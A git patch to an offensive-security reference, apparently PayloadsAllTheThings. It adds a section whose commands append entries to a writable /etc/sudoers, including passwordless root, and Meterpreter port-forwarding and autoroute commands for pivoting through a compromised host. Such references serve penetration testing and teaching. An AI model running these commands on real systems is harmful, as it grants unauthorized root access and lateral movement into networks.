From 94a60b43d683837523024845f19b97b1d984e201 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Jun 2019 11:00:54 +0200 Subject: [PATCH] Writable /etc/sudoers + Meterpreter autoroute --- .../Linux - Privilege Escalation.md | 15 +++++++++-- .../Network Pivoting Techniques.md | 27 ++++++++++++++++--- 2 files changed, 37 insertions(+), 5 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 681ef8a..6afe24e 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -7,7 +7,7 @@ ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t ``` - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) -- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123) +- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) ## Summary @@ -35,7 +35,8 @@ * [sudo_inject](#sudo-inject) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) -* [Writable /etc/passwd](#writable---etc---passwd) +* [Writable /etc/passwd](#writable-etcpasswd) +* [Writable /etc/sudoers](#writable-etcsudoers) * [NFS Root Squashing](#nfs-root-squashing) * [Shared Library](#shared-library) * [ldconfig](#ldconfig) @@ -399,6 +400,16 @@ su - dummy NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. +## Writable /etc/sudoers + +```powershell +echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers + +# use SUDO without password +echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +``` + + ## NFS Root Squashing When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index e35bc19..9ef65ac 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -103,15 +103,36 @@ optional arguments: ## Metasploit -```c -portfwd list +```powershell +# Meterpreter list active port forwards +portfwd list + +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd add –l 3389 –p 3389 –r target-host portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd delete –l 3389 –p 3389 –r target-host +# Meterpreter delete all port forwards +portfwd flush + or -run autoroute -s 192.168.57.0/24 +# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 +run autoroute -s 192.168.15.0/24 use auxiliary/server/socks4a + +# Meterpreter list all active routes +run autoroute -p + +route #Meterpreter view available networks the compromised host can access +# Meterpreter add route for 192.168.14.0/24 via Session number. +route add 192.168.14.0 255.255.255.0 3 +# Meterpreter delete route for 192.168.14.0/24 via Session number. +route delete 192.168.14.0 255.255.255.0 3 +# Meterpreter delete all routes +route flush ``` ## sshuttle